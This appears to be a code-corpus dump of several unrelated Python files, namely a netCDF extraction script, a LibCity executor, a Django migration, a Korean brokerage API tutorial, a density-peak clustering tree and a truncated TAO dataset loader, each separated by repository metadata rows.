# Instead, I'm resorting to a blocking approach where MFDatasets are # created for only a few netCDF files at a time indata.close() i = 0 total = 0 logger.info("Beginning extraction...") start_time = time.perf_counter() times_ct = outdata.dimensions['time'].size for cdfchunk in chunks(exist_cdfs, args.chunk_size): c = MFDataset(cdfchunk) if len(cdfchunk) > 1 else Dataset(cdfchunk[0]) chunk_times = len(c.dimensions['time']) data = copy_data(c, outdata, i, node_ids, **vars(args)) i += chunk_times c.close() elapsed = (time.perf_counter() - start_time) to_go = elapsed * (times_ct / i - 1) total += np.sum([d.size * d.itemsize for k,d in data.items()]) logger.info("{0}/{1} ({2}s elapsed, {3}s to go, {4}KBps)".format(i, times_ct, int(elapsed), int(to_go), int(total/elapsed/1000))) logger.info("Extraction finished.") outdata.close() def copy_data(cdfin, cdfout, timeidx, node_ids, **kwargs): args = Namespace(**kwargs) times_ct = len(cdfin.dimensions['time']) alldata = {} # Copy zeta if it's needed if 'zeta' in cdfout.variables: alldata['zeta'] = cdfin['zeta'][:, node_ids - 1] cdfout['zeta'][timeidx:timeidx + times_ct, :] = alldata['zeta'] for var, attr in args.input_vars: out_name = args.outprefix + var if attr == InputAttr.ALL: slc = slice(None) elif attr == InputAttr.BOTTOM: slc = -1 out_name += "_bottom" # TODO add "photic" case which will look rather different data = cdfin[var][:, slc, node_ids - 1] logger.debug("data is shape " + str(data.shape)) if attr == InputAttr.ALL: cdfout[out_name][timeidx:timeidx+times_ct,:,:] = data else: cdfout[out_name][timeidx:timeidx+times_ct,:] = data alldata[out_name] = data return alldata if __name__ == "__main__": main()
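A short sketch of the two small helpers the CLI relies on, assuming `colon_meta`, `chunks`, and `InputAttr` from the module above are in scope; the file names are hypothetical:

# Parsing an --invar argument into (variable, extraction attribute)
print(colon_meta("DOXG:bottom"))   # -> ('DOXG', <InputAttr.BOTTOM: 1>)
print(colon_meta("temp:all"))      # -> ('temp', <InputAttr.ALL: 0>)

# Windowing a list of input CDFs into chunk_size-sized MFDataset groups
files = [f"ssm_{i:04d}.nc" for i in range(10)]  # hypothetical file names
for group in chunks(files, 4):
    print(group)                   # 4 + 4 + 2 files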
40.461538
117
0.64225
93
0.0104
132
0.014762
0
0
0
0
2,388
0.267054
4c55251ed58f769e9fbe55114b14a016770952cb
1,075
py
Python
libcity/executor/map_matching_executor.py
nadiaaaaachen/Bigscity-LibCity
d8efd38fcc238e3ba518c559cc9f65b49efaaf71
[ "Apache-2.0" ]
1
2021-11-22T12:22:32.000Z
2021-11-22T12:22:32.000Z
libcity/executor/map_matching_executor.py
yuanhaitao/Bigscity-LibCity
9670c6a2f26043bb8d9cc1715780bb599cce2cd5
[ "Apache-2.0" ]
null
null
null
libcity/executor/map_matching_executor.py
yuanhaitao/Bigscity-LibCity
9670c6a2f26043bb8d9cc1715780bb599cce2cd5
[ "Apache-2.0" ]
null
null
null
from logging import getLogger
from libcity.executor.abstract_tradition_executor import AbstractTraditionExecutor
from libcity.utils import get_evaluator


class MapMatchingExecutor(AbstractTraditionExecutor):

    def __init__(self, config, model):
        self.model = model
        self.config = config
        self.evaluator = get_evaluator(config)
        self.evaluate_res_dir = './libcity/cache/evaluate_cache'
        self._logger = getLogger()

    def evaluate(self, test_data):
        """
        Run the model on the test data and evaluate the result.

        Args:
            test_data: test data containing the route and the road network
        """
        result = self.model.run(test_data)
        batch = {'route': test_data['route'], 'result': result, 'rd_nwk': test_data['rd_nwk']}
        self.evaluator.collect(batch)
        self.evaluator.save_result(self.evaluate_res_dir)

    def train(self, train_dataloader, eval_dataloader):
        """
        Traditional (non-learned) models do not need training.

        Args:
            train_dataloader(torch.Dataloader): Dataloader
            eval_dataloader(torch.Dataloader): Dataloader
        """
        pass  # do nothing
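Because the executor only duck-types its collaborators (a model exposing `run`, an evaluator exposing `collect`/`save_result`), its control flow can be traced with stubs. A minimal sketch with hypothetical stand-ins, not the real libcity classes:

# Hypothetical stubs that mirror the interfaces evaluate() relies on.
class StubModel:
    def run(self, test_data):
        return {"matched": []}          # pretend map-matching result

class StubEvaluator:
    def collect(self, batch):
        print("collected keys:", sorted(batch))
    def save_result(self, res_dir):
        print("saved to", res_dir)

test_data = {"route": [], "rd_nwk": None}
result = StubModel().run(test_data)
batch = {"route": test_data["route"], "result": result, "rd_nwk": test_data["rd_nwk"]}
ev = StubEvaluator()
ev.collect(batch)
ev.save_result("./libcity/cache/evaluate_cache")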
29.861111
94
0.652093
943
0.858053
0
0
0
0
0
0
357
0.324841
4c55a30419a518ea1054e9871ae5c2c7cf5db9f5
307
py
Python
project1/budget/migrations/0005_delete_hiddenstatus_budget.py
sujeethiremath/Project-1
7f0bff66287d479e231e123615f2df18f9107178
[ "MIT" ]
null
null
null
project1/budget/migrations/0005_delete_hiddenstatus_budget.py
sujeethiremath/Project-1
7f0bff66287d479e231e123615f2df18f9107178
[ "MIT" ]
null
null
null
project1/budget/migrations/0005_delete_hiddenstatus_budget.py
sujeethiremath/Project-1
7f0bff66287d479e231e123615f2df18f9107178
[ "MIT" ]
null
null
null
# Generated by Django 2.2.5 on 2020-04-08 00:08 from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('budget', '0004_auto_20200407_2356'), ] operations = [ migrations.DeleteModel( name='HiddenStatus_Budget', ), ]
18.058824
47
0.618893
222
0.723127
0
0
0
0
0
0
101
0.32899
4c55bbb06ea35dd59d573da6a8f782da8c81fbf2
3,548
py
Python
tutorial/43.py
mssung94/daishin-trading-system
d6682495afb7a08e68db65537b1d1789f2996891
[ "MIT" ]
2
2020-11-21T08:45:26.000Z
2020-11-21T08:50:56.000Z
tutorial/43.py
mssung94/daishin-trading-system
d6682495afb7a08e68db65537b1d1789f2996891
[ "MIT" ]
null
null
null
tutorial/43.py
mssung94/daishin-trading-system
d6682495afb7a08e68db65537b1d1789f2996891
[ "MIT" ]
null
null
null
# Daishin Securities API
# Example comparing the two ways to request data: BlockRequest vs. Request

# The Plus API offers two main ways to request data:
#
# BlockRequest - the simplest way to request data and receive the reply
# Call Request, then receive the reply through the Received event
#
# The example code below lets you compare the two approaches.
# For ordinary data requests, BlockRequest is the simplest.
# However, BlockRequest also pumps messages internally, so if real-time quotes arrive
# before the call completes, or the call is re-entered recursively from another event,
# the call may fail.
# When you need to communicate while handling complex real-time quotes, use the Request approach.

import pythoncom
from PyQt5.QtWidgets import *
import win32com.client
import win32event

g_objCodeMgr = win32com.client.Dispatch('CpUtil.CpCodeMgr')

StopEvent = win32event.CreateEvent(None, 0, 0, None)


class CpEvent:
    def set_params(self, client, name, caller):
        self.client = client  # CP real-time communication object
        self.name = name  # name used to tell apart events from different services
        self.caller = caller  # kept for the callback

    def OnReceived(self):
        # Real-time handling - order execution at the current price
        if self.name == 'stockmst':
            print('received')
            win32event.SetEvent(StopEvent)
            return


class CpCurReply:
    def __init__(self, objEvent):
        self.name = "stockmst"
        self.obj = objEvent

    def Subscribe(self):
        handler = win32com.client.WithEvents(self.obj, CpEvent)
        handler.set_params(self.obj, self.name, None)


def MessagePump(timeout):
    waitables = [StopEvent]
    while 1:
        rc = win32event.MsgWaitForMultipleObjects(
            waitables,
            0,  # Wait for all = false, so it waits for anyone
            timeout,  # (or win32event.INFINITE)
            win32event.QS_ALLEVENTS)  # Accepts all input

        if rc == win32event.WAIT_OBJECT_0:
            # Our first event listed, the StopEvent, was triggered, so we must exit
            print('stop event')
            break

        elif rc == win32event.WAIT_OBJECT_0 + len(waitables):
            # A windows message is waiting - take care of it. (Don't ask me
            # why a WAIT_OBJECT_MSG isn't defined < WAIT_OBJECT_0...!).
            # This message-serving MUST be done for COM, DDE, and other
            # Windowsy things to work properly!
            print('pump')
            if pythoncom.PumpWaitingMessages():
                break  # we received a wm_quit message
        elif rc == win32event.WAIT_TIMEOUT:
            print('timeout')
            return
            pass
        else:
            print('exception')
            raise RuntimeError("unexpected win32wait return value")


code = 'A005930'

##############################################################
# 1. BlockRequest
print('#####################################')
objStockMst = win32com.client.Dispatch("DsCbo1.StockMst")
objStockMst.SetInputValue(0, code)
objStockMst.BlockRequest()
print('Data received via BlockRequest')
item = {}
item['종목명'] = g_objCodeMgr.CodeToName(code)
item['현재가'] = objStockMst.GetHeaderValue(11)  # closing price
item['대비'] = objStockMst.GetHeaderValue(12)  # change from the previous day
print(item)
print('')

##############################################################
# 2. Request ==> message pump ==> receive the OnReceived event
print('#####################################')
objReply = CpCurReply(objStockMst)
objReply.Subscribe()
code = 'A005930'
objStockMst.SetInputValue(0, code)
objStockMst.Request()
MessagePump(10000)
item = {}
item['종목명'] = g_objCodeMgr.CodeToName(code)
item['현재가'] = objStockMst.GetHeaderValue(11)  # closing price
item['대비'] = objStockMst.GetHeaderValue(12)  # change from the previous day
print(item)
31.39823
84
0.590755
748
0.179033
0
0
0
0
0
0
2,080
0.497846
4c55db68c1c667219febb6705164366e8f8c7adb
18,439
py
Python
ADPTC_LIB/DPTree_ST.py
SuilandCoder/ADPTC_LIB
ef5c2b7fcf117c8c90a3841489471289ecbf4562
[ "MIT" ]
null
null
null
ADPTC_LIB/DPTree_ST.py
SuilandCoder/ADPTC_LIB
ef5c2b7fcf117c8c90a3841489471289ecbf4562
[ "MIT" ]
null
null
null
ADPTC_LIB/DPTree_ST.py
SuilandCoder/ADPTC_LIB
ef5c2b7fcf117c8c90a3841489471289ecbf4562
[ "MIT" ]
null
null
null
#%%
import numpy as np
import copy
import matplotlib.pyplot as plt
import time

def split_cluster_new(tree,local_density,dc_eps,closest_denser_nodes_id,mixin_near_matrix):
    '''
    dc_eps: density_connectivity threshold
    Split clusters using the direct distance between parent and child nodes,
    together with the connectivity distance between a child and its siblings;
    use the mean density to separate outliers.
    Returns: outlier_forest, cluster_forest
    '''
    mean_density = np.mean(local_density)
    outlier_forest = {}
    cluster_forest = {}
    uncertain_forest = {}
    not_direct_reach = []
    #* collect the points that are not directly reachable:
    for k in range(len(closest_denser_nodes_id)):
        near_nodes = mixin_near_matrix[k]
        if closest_denser_nodes_id[k] not in near_nodes:
            not_direct_reach.append(k)
        pass
    not_direct_reach = np.array(not_direct_reach)
    # not_direct_reach = np.where(closest_dis_denser>eps)[0]
    #* order the not-directly-reachable points by their depth in the tree:
    # not_direct_reach = np.array(not_direct_reach)
    depth_list_not_direct_reach= np.zeros(len(not_direct_reach),dtype=np.int16)
    for i in range(len(not_direct_reach)):
        # depth_list_not_direct_reach[i] = tree.node_dir[not_direct_reach[i]].getLvl()
        depth_list_not_direct_reach[i] = tree.calcu_depth(not_direct_reach[i],0)
        pass
    not_direct_reach = list(not_direct_reach[np.argsort(depth_list_not_direct_reach)])
    #* emulate a stack: the deepest nodes are processed first
    start = time.perf_counter()
    while(len(not_direct_reach)>0):
        #* connectivity test: the distance must be below the threshold and the density above the subtree mean
        node_id = not_direct_reach.pop()
        if(node_id==129193 or node_id==61589 or node_id == 123593):
            print(node_id)
        if node_id in tree.sorted_gamma_index[0:10]:
            cluster_forest[node_id] = tree.remove_subtree(node_id)
            continue
        node = tree.node_dir[node_id]
        parent_id = node.parent_id
        parent_node = tree.node_dir[parent_id]
        children = parent_node.getChildren()
        siblings_reliable = [ i for i in children if i not in not_direct_reach] #* siblings, excluding points that are not directly reachable
        not_reliable_nodes = [i for i in children if i not in siblings_reliable]
        if node_id in not_reliable_nodes:
            not_reliable_nodes.remove(node_id)
        if node_id in siblings_reliable:
            siblings_reliable.remove(node_id)
        pairs_nodes = is_connected_new(tree,local_density,dc_eps,node_id,siblings_reliable,not_reliable_nodes,mixin_near_matrix)
        if len(pairs_nodes)==0:
            if(node_id==tree.root_node.node_id):
                continue
            if(local_density[node_id]-mean_density*dc_eps)>=0:
                #* check the number of offspring:
                offspring_id = tree.get_subtree_offspring_id(node_id,[node_id])
                if(len(offspring_id)<local_density[node_id]):
                    uncertain_forest[node_id] = tree.remove_subtree(node_id)
                    pass
                else:
                    cluster_forest[node_id] = tree.remove_subtree(node_id)
                    pass
                pass
            else:
                outlier_forest[node_id] = tree.remove_subtree(node_id)
                pass
            pass
        pass
    end = time.perf_counter()
    print('Splitting the tree took %s s' % str(end - start))
    cluster_forest[tree.root_node.node_id] = tree #* add the tree rooted at the root node
    return outlier_forest, cluster_forest, uncertain_forest

def is_connected_new(tree,local_density,dc_eps,cur_node_id,reliable_nodes,not_reliable_nodes,mixin_near_matrix):
    '''
    cur_node: the point whose connectivity to its parent is being tested;
    reliable_nodes: siblings that are directly connected to the parent;
    not_reliable_nodes: siblings that are not directly connected to the parent, but may be connected indirectly;
    Connectivity test:
    1. Check whether cur_node can reach reliable_nodes; if so, return; otherwise go to 2;
    2. Check whether cur_node can reach not_reliable_nodes (say [a,b,c,d,e]); if it reaches [a,b,c] but not [d,e], go to 3;
    3. Loop over [a,b,c], calling this method recursively: is_connected_entropy(..., cur_node_id=[a], reliable_nodes, not_reliable_nodes=[b,c,d,e])
    '''
    #* 1.
    if(len(reliable_nodes)==0):
        return []
    for reliable_node_id in reliable_nodes:
        pairs_nodes, connected_nodes = tree.calcu_neighbor_btw_subtree(cur_node_id,reliable_node_id,mixin_near_matrix)
        if(len(pairs_nodes)==0):
            continue
        # return pairs_nodes
        cur_node_offspring = tree.get_subtree_offspring_id(cur_node_id,[cur_node_id])
        local_density_cur_offspring = np.mean(local_density[cur_node_offspring])
        local_density_connected_nodes = np.mean(local_density[connected_nodes])
        if(local_density_connected_nodes>local_density_cur_offspring*dc_eps):
            return pairs_nodes
        pass
    #* 2.
    for i in range(len(not_reliable_nodes)):
        pairs_nodes, connected_nodes = tree.calcu_neighbor_btw_subtree(cur_node_id,not_reliable_nodes[i],mixin_near_matrix)
        if(len(pairs_nodes)==0):
            pairs_nodes = is_connected_new(tree,local_density,dc_eps,not_reliable_nodes[i],reliable_nodes,not_reliable_nodes[i+1:],mixin_near_matrix)
            if(len(pairs_nodes)>0):
                return pairs_nodes
        else:
            cur_node_offspring = tree.get_subtree_offspring_id(cur_node_id,[cur_node_id])
            local_density_cur_offspring = np.mean(local_density[cur_node_offspring])
            local_density_connected_nodes = np.mean(local_density[connected_nodes])
            if(local_density_connected_nodes>local_density_cur_offspring*dc_eps):
                return pairs_nodes
            # return pairs_nodes
        # #* if the mean density of the connected points exceeds the local density threshold, update the maximum similarity
        cur_node_offspring = tree.get_subtree_offspring_id(cur_node_id,[cur_node_id])
        local_density_cur_offspring = np.mean(local_density[cur_node_offspring])
        local_density_connected_nodes = np.mean(local_density[connected_nodes])
        if(local_density_connected_nodes>local_density_cur_offspring*dc_eps):
            return pairs_nodes
        if(len(pairs_nodes)==0):
            pairs_nodes = is_connected_new(tree,local_density,dc_eps,not_reliable_nodes[i],reliable_nodes,not_reliable_nodes[i+1:],mixin_near_matrix)
            if(len(pairs_nodes)>0):
                return pairs_nodes
        # pass
    return []

def label_these_node_new(outlier_forest,cluster_forest,node_num,uncertain_forest,mixin_near_matrix):
    '''
    Label the sample points in the forests,
    taking the assignment of uncertain points into account.
    '''
    labels = np.full((node_num),-1,dtype=np.int32)
    for outlier_id in outlier_forest:
        outlier_tree = outlier_forest[outlier_id]
        outlier_idlist = outlier_tree.get_subtree_offspring_id(outlier_id,[outlier_id])
        labels[outlier_idlist] = -1
        pass

    label = 0
    for tree_id in cluster_forest:
        cluster_tree = cluster_forest[tree_id]
        cluster_idlist = cluster_tree.get_subtree_offspring_id(tree_id,[tree_id])
        labels[cluster_idlist] = label
        label = label + 1
        pass

    # TODO: revise this code
    for uncertain_tree_id in uncertain_forest:
        uncertain_tree = uncertain_forest[uncertain_tree_id]
        uncertain_nodes_id = uncertain_tree.get_subtree_offspring_id(uncertain_tree_id,[uncertain_tree_id])
        all_near_nodes = np.array([],dtype=np.int32)
        for node_id in uncertain_nodes_id:
            all_near_nodes = np.append(all_near_nodes,mixin_near_matrix[node_id])
            pass
        # all_near_nodes = mixin_near_matrix[uncertain_nodes_id]
        all_near_nodes = np.unique(all_near_nodes)
        all_near_nodes = all_near_nodes[np.where(labels[all_near_nodes]!=-1)]
        unique_labels,counts=np.unique(labels[all_near_nodes],return_counts=True)
        if(len(counts)==0):
            cur_label = -1
        else:
            cur_label = unique_labels[np.argmax(counts)]
        labels[uncertain_nodes_id]=cur_label
        pass

    core_points = cluster_forest.keys()
    return labels,core_points

'''
Density-peak tree:
built from the local density, the distance to the nearest denser neighbor,
and the decision metric produced by the CFSFDP algorithm.
'''
class Node():
    def __init__(self,node_id,attr_list,parent_id=None,dist_to_parent=None,density=None,gamma=None,children=[]):
        self.node_id = node_id
        self.attr_list = attr_list
        self.parent_id = parent_id
        self.dist_to_parent = dist_to_parent
        self.density = density
        self.children = children
        self.gamma = gamma
        self.offspring_num = None
        self.lvl = None

    def addChild(self,child):
        self.children+=[child]

    def removeChild(self,child):
        self.children.remove(child)

    def resetChildren(self):
        self.children = []

    def setParentId(self,parent_id):
        self.parent_id = parent_id

    def setOffspringNum(self,num):
        self.offspring_num = num

    def setLvl(self,lvl):
        self.lvl = lvl

    def getAttr(self):
        return self.attr_list

    def getNodeId(self):
        return self.node_id

    def getParentId(self):
        return self.parent_id

    def getDistToParent(self):
        return self.dist_to_parent

    def getDensity(self):
        return self.density

    def getGamma(self):
        return self.gamma

    def getChildren(self):
        return self.children

    def hasChildren(self,child_id):
        if child_id in self.children:
            return True
        else:
            return False

    def getOffspringNum(self):
        return self.offspring_num

    def getLvl(self):
        return self.lvl

class DPTree():
    def __init__(self):
        self.node_count = 0
        self.node_dir = {}
        self.root_node = None
        self.node_offspring = {}
        self.sorted_gamma_index = None
        pass

    def createTree(self,X,sorted_gamma_index,closest_node_id,closest_dis_denser,local_density,gamma):
        #* create nodes in gamma order
        node_dir = {}
        node_created = np.zeros(len(sorted_gamma_index))
        self.sorted_gamma_index = sorted_gamma_index
        for i in range(len(sorted_gamma_index)):
            node_id = sorted_gamma_index[i]
            parent_id = closest_node_id[node_id] #* closest_node_id follows the sorted gamma order
            attr_list = X[node_id]
            dist_to_parent = closest_dis_denser[node_id]
            density = local_density[node_id]
            if(node_created[node_id]==0):
                node = Node(node_id,attr_list,parent_id,dist_to_parent=dist_to_parent,density=density,gamma=gamma[node_id],children=[])
                node_created[node_id] = 1
                node_dir[node_id] = node
            node_dir[node_id].setParentId(parent_id)
            if(node_created[parent_id]==0):
                parent_node = Node(parent_id,X[parent_id],parent_id=None,dist_to_parent=closest_dis_denser[parent_id],density=local_density[parent_id],gamma=gamma[parent_id],children=[])
                node_created[parent_id] = 1
                node_dir[parent_id] = parent_node
            parent_node = node_dir[parent_id]
            cur_node = node_dir[node_id]
            if(node_id != parent_id):#* not the root node
                parent_node.addChild(node_id)
                # parent_lvl = parent_node.getLvl()
                # cur_node.setLvl(parent_lvl+1)
            else:
                if(parent_node.getLvl()==None):
                    parent_node.setLvl(0)
        #* set the level information of the nodes
        # for i in tree.node_dir:
        #     pass
        self.root_node = node_dir[sorted_gamma_index[0]]
        self.node_dir = node_dir
        self.node_count = len(sorted_gamma_index)
        pass

    def printTree2(self,parent_id,spaceStr=''):
        for node_id in self.node_dir:
            if(node_id==self.root_node.node_id):
                continue
            node = self.node_dir[node_id]
            if(node.parent_id==parent_id):
                print(spaceStr, node.node_id, sep = '')
                self.printTree2(node.node_id,spaceStr+'  ')
        pass

    def calcu_subtree_offspring_num(self,node_id):
        node = self.node_dir[node_id]
        cur_offsprings = node.getOffspringNum()
        if(cur_offsprings!=None):
            return cur_offsprings
        child_num = len(node.children)
        if(child_num==0):
            return 0
        for i in node.children:
            cur_offsprings = self.calcu_subtree_offspring_num(i)
            child_num+=cur_offsprings
        node.setOffspringNum(child_num)
        return child_num

    def get_subtree_offspring_id(self,node_id,other_idlist):
        '''
        Collect the node_ids of all descendants.
        Note: consider whether this should be stored as a node attribute.
        '''
        def fn_get_subtree_offspring_id(node_id,offspring_idlist):
            if(node_id in self.node_offspring.keys()):
                return self.node_offspring[node_id]
            else:
                node = self.node_dir[node_id]
                children = node.getChildren()
                child_num = len(children)
                if(child_num==0):
                    self.node_offspring[node_id] = offspring_idlist
                    return offspring_idlist
                offspring_idlist= list(offspring_idlist) + children
                for i in children:
                    child_offspring_idlist = fn_get_subtree_offspring_id(i,[])
                    self.node_offspring[i] = child_offspring_idlist
                    offspring_idlist= list(offspring_idlist) + child_offspring_idlist
                    pass
                self.node_offspring[node_id] = offspring_idlist
                return offspring_idlist
        offspring_idlist = fn_get_subtree_offspring_id(node_id,[])
        return np.array(list(offspring_idlist) + other_idlist)

    def calcu_subtree_entropy(self,offspring_id,local_density,closest_dis_denser):
        p_sum = np.sum(local_density[offspring_id]/closest_dis_denser[offspring_id])
        p = (local_density[offspring_id]/closest_dis_denser[offspring_id])/p_sum
        entropy = -1*np.sum(p*np.log2(p))
        #* a subtree with a single point returns 0
        if(entropy==0):
            return 0
        return entropy/(-1*np.log2(1/(len(offspring_id))))

    def remove_subtree(self,child_id):
        '''
        Remove the subtree rooted at child_id from its parent node;
        the removed subtree forms a new tree and is returned.
        1. update self.node_dir and self.node_count
        2. update the children[] of the parent node and the offspring_num of all ancestors
        3. build the new tree
        '''
        # print("removing child node:",child_id)
        offspring_id = self.get_subtree_offspring_id(child_id,[child_id])
        offspring_len = len(offspring_id)
        node_id = self.node_dir[child_id].parent_id
        node = self.node_dir[node_id]
        node.removeChild(child_id)
        self.node_count = self.node_count-offspring_len
        #* drop the cached descendant lists
        if(node_id in self.node_offspring.keys()):
            for node_to_delete in offspring_id:
                self.node_offspring[node_id].remove(node_to_delete)
                print("removing descendant node:",node_to_delete)
                pass
            pass
        # cur_id = child_id
        # parent_id = node_id
        # #* update offspring_num of the ancestors:
        # while(cur_id!=parent_id):
        #     parent_node = self.node_dir[parent_id]
        #     if(parent_node.getOffspringNum()!=None):
        #         parent_node.setOffspringNum(parent_node.getOffspringNum()-offspring_len)
        #     cur_id = parent_id
        #     parent_id = parent_node.parent_id
        #     pass
        #* update self.node_dir and build the new tree:
        new_tree = DPTree()
        for i in offspring_id:
            removed_node = self.node_dir.pop(i)
            new_tree.node_dir[i] = removed_node
            pass
        new_tree.node_count = offspring_len
        new_tree.root_node = new_tree.node_dir[child_id]
        new_tree.root_node.setParentId(child_id)
        return new_tree

    def calcu_dist_betw_subtree(self,node_id_one,node_id_two,dist_mat,eps):
        '''
        Compute the connectivity distance between two subtrees.
        return:
        1. the shortest distance
        2. the set of points closer than the distance threshold
        '''
        connected_nodes = np.array([],dtype=np.int32)
        offspring_one = self.get_subtree_offspring_id(node_id_one,[node_id_one])
        offspring_two = self.get_subtree_offspring_id(node_id_two,[node_id_two])
        dist = float('inf')
        for i in offspring_two:
            tmp_dist = np.min(dist_mat[i][offspring_one])
            if(tmp_dist<dist):
                dist = tmp_dist
                pass
            connected_nodes_index = np.where(dist_mat[i][offspring_one]<eps)[0]
            if len(connected_nodes_index)>0:
                connected_nodes = np.r_[[i],connected_nodes,offspring_one[connected_nodes_index]]
                pass
        return dist, np.unique(connected_nodes)

    def calcu_neighbor_btw_subtree(self,node_id_one,node_id_two,mixin_near_matrix):
        '''
        Find the neighboring points between two subtrees.
        return:
        the neighboring pairs
        all neighboring points
        '''
        connected_nodes = np.array([],dtype=np.int32)
        offspring_one = self.get_subtree_offspring_id(node_id_one,[node_id_one])
        offspring_two = self.get_subtree_offspring_id(node_id_two,[node_id_two])
        pairs_nodes = []
        for i in offspring_two:
            connected_nodes_index = np.intersect1d(mixin_near_matrix[i],offspring_one)
            if len(connected_nodes_index)>0:
                for j in connected_nodes_index:
                    pairs_nodes.append([i,j])
                    pass
                pass
            pass
        if(len(pairs_nodes)==0):
            return pairs_nodes,connected_nodes
        return np.array(pairs_nodes), np.unique(np.array(pairs_nodes).flatten())

    def calcu_dist_betw_subtree_entropy(self,node_id_one,node_id_two,dist_mat,eps):
        '''
        Compute the connectivity distance between two subtrees.
        return:
        1. the largest similarity distance
        2. the set of points above the similarity threshold
        '''
        connected_nodes = np.array([],dtype=np.int32)
        offspring_one = self.get_subtree_offspring_id(node_id_one,[node_id_one])
        offspring_two = self.get_subtree_offspring_id(node_id_two,[node_id_two])
        dist = -1
        for i in offspring_two:
            tmp_dist = np.max(dist_mat[i][offspring_one])
            if(tmp_dist>=dist):
                dist = tmp_dist
                pass
            connected_nodes_index = np.where(dist_mat[i][offspring_one]>=eps)[0]
            if len(connected_nodes_index)>0:
                connected_nodes = np.r_[[i],connected_nodes,offspring_one[connected_nodes_index]]
                pass
        return dist, np.unique(connected_nodes)

    def calcu_depth(self,node_id, depth):
        node = self.node_dir[node_id]
        parent_id = node.parent_id
        if(node_id==parent_id):
            return depth
        else:
            return self.calcu_depth(parent_id,depth+1)
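A minimal synthetic example of building and inspecting a `DPTree`, assuming the classes above are in scope; the arrays below are hypothetical and mimic CFSFDP outputs, with the densest point (node 0) acting as its own parent:

import numpy as np

X = np.arange(10, dtype=float).reshape(5, 2)       # five 2-D points
local_density = np.array([5.0, 4.0, 3.0, 2.0, 1.0])
closest_node_id = np.array([0, 0, 1, 1, 2])        # each node's denser neighbor (root points to itself)
closest_dis_denser = np.array([99.0, 1.0, 1.0, 1.5, 2.0])
gamma = local_density * closest_dis_denser         # decision metric, largest at the root
sorted_gamma_index = np.argsort(-gamma)

tree = DPTree()
tree.createTree(X, sorted_gamma_index, closest_node_id, closest_dis_denser, local_density, gamma)
tree.printTree2(tree.root_node.node_id)            # prints the child hierarchy under the root
print(tree.calcu_depth(4, 0))                      # node 4 sits 3 levels below the root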
38.575314
186
0.633548
11,101
0.566927
0
0
0
0
0
0
3,557
0.181656
4c56a26b957f0f1d768b5949bae27c075bbc9817
10,280
py
Python
datasets/tao/tao.py
Nik-V9/AirObject
5937e64531f08449e81d2c90e3c6643727efbaf0
[ "BSD-3-Clause" ]
9
2022-03-15T17:28:48.000Z
2022-03-29T12:32:28.000Z
datasets/tao/tao.py
Nik-V9/AirObject
5937e64531f08449e81d2c90e3c6643727efbaf0
[ "BSD-3-Clause" ]
1
2022-03-29T06:03:14.000Z
2022-03-29T13:38:29.000Z
datasets/tao/tao.py
Nik-V9/AirObject
5937e64531f08449e81d2c90e3c6643727efbaf0
[ "BSD-3-Clause" ]
1
2022-03-15T19:34:06.000Z
2022-03-15T19:34:06.000Z
from __future__ import print_function

import sys
sys.path.append('.')

import os
from typing import Optional, Union
import cv2
import numpy as np
import PIL.Image as Image
import pickle

import torch
from torch.utils import data

__all__ = ["TAO"]


class TAO(data.Dataset):
    r"""A torch Dataset for loading in `the TAO VOS dataset <https://www.vision.rwth-aachen.de/page/taovos/>`_.
    Will fetch sequences of rgb images, instance segmentation labels, SuperPoint features (optional).

    Example of sequence creation from frames with `seqlen=4`, `dilation=1`, `stride=3`, and `start=2`:

    .. code-block::


                                            sequence0
                        ┎───────────────┲───────────────┲───────────────┒
                        |               |               |               |
        frame0  frame1  frame2  frame3  frame4  frame5  frame6  frame7  frame8  frame9  frame10  frame11 ...
                                                |               |               |                |
                                                └───────────────┵───────────────┵────────────────┚
                                                                    sequence1

    Args:
        basedir (str): Path to the base directory containing the directories from TAO.
        videos (str or tuple of str): Videos to use from sequences (used for creating train/val/test splits). Can
            be path to a `.txt` file where each line is a Video Sequence name, or a tuple of scene names.
        seqlen (int): Number of frames to use for each sequence of frames. Default: 4
        dilation (int or None): Number of (original video's) frames to skip between two consecutive
            frames in the extracted sequence. See above example if unsure.
            If None, will set `dilation = 0`. Default: None
        stride (int or None): Number of frames between the first frames of two consecutive extracted sequences.
            See above example if unsure. If None, will set `stride = seqlen * (dilation + 1)`
            (non-overlapping sequences). Default: None
        start (int or None): Index of the frame from which to start extracting sequences for every video.
            If None, will start from the first frame. Default: None
        end (int): Index of the frame at which to stop extracting sequences for every video.
            If None, will continue extracting frames until the end of the video. Default: None
        height (int): Spatial height to resize frames to. Default: 480
        width (int): Spatial width to resize frames to. Default: 640
        return_img (bool): Determines whether to return rgb frames. Default: True
        return_seg (bool): Determines whether to return instance segmentation labels. Default: True
        return_points (bool): Determines whether to return SuperPoint Features. Default: False
        return_videonames (bool): Determines whether to return videonames for the sequences. Default: False
    """

    def __init__(
        self,
        basedir: str,
        videos: Union[tuple, str, None],
        seqlen: int = 4,
        dilation: Optional[int] = None,
        stride: Optional[int] = None,
        start: Optional[int] = None,
        end: Optional[int] = None,
        height: int = 480,
        width: int = 640,
        *,
        return_img: bool = True,
        return_seg: bool = True,
        return_points: bool = False,
        return_videonames: bool = False,
    ):
        super(TAO, self).__init__()

        self.basedir = os.path.normpath(basedir)
        if not os.path.isdir(self.basedir):
            raise ValueError("Base Directory: {} doesn't exist".format(basedir))

        self.height = height
        self.width = width

        self.return_img = return_img
        self.return_seg = return_seg
        self.return_points = return_points
        self.return_videonames = return_videonames

        if not isinstance(seqlen, int):
            raise TypeError("seqlen must be int. Got {0}.".format(type(seqlen)))
        if not (isinstance(stride, int) or stride is None):
            raise TypeError("stride must be int or None. Got {0}.".format(type(stride)))
        if not (isinstance(dilation, int) or dilation is None):
            raise TypeError(
                "dilation must be int or None. Got {0}.".format(type(dilation))
            )
        dilation = dilation if dilation is not None else 0
        stride = stride if stride is not None else seqlen * (dilation + 1)
        self.seqlen = seqlen
        self.stride = stride
        self.dilation = dilation

        if seqlen < 0:
            raise ValueError("seqlen must be positive. Got {0}.".format(seqlen))
        if dilation < 0:
            raise ValueError('"dilation" must be positive. Got {0}.'.format(dilation))
        if stride < 0:
            raise ValueError("stride must be positive. Got {0}.".format(stride))

        if not (isinstance(start, int) or start is None):
            raise TypeError("start must be int or None. Got {0}.".format(type(start)))
        if not (isinstance(end, int) or end is None):
            raise TypeError("end must be int or None. Got {0}.".format(type(end)))

        start = start if start is not None else 0
        self.start = start
        self.end = end

        if start < 0:
            raise ValueError("start must be positive. Got {0}.".format(start))
        if not (end is None or end > start):
            raise ValueError(
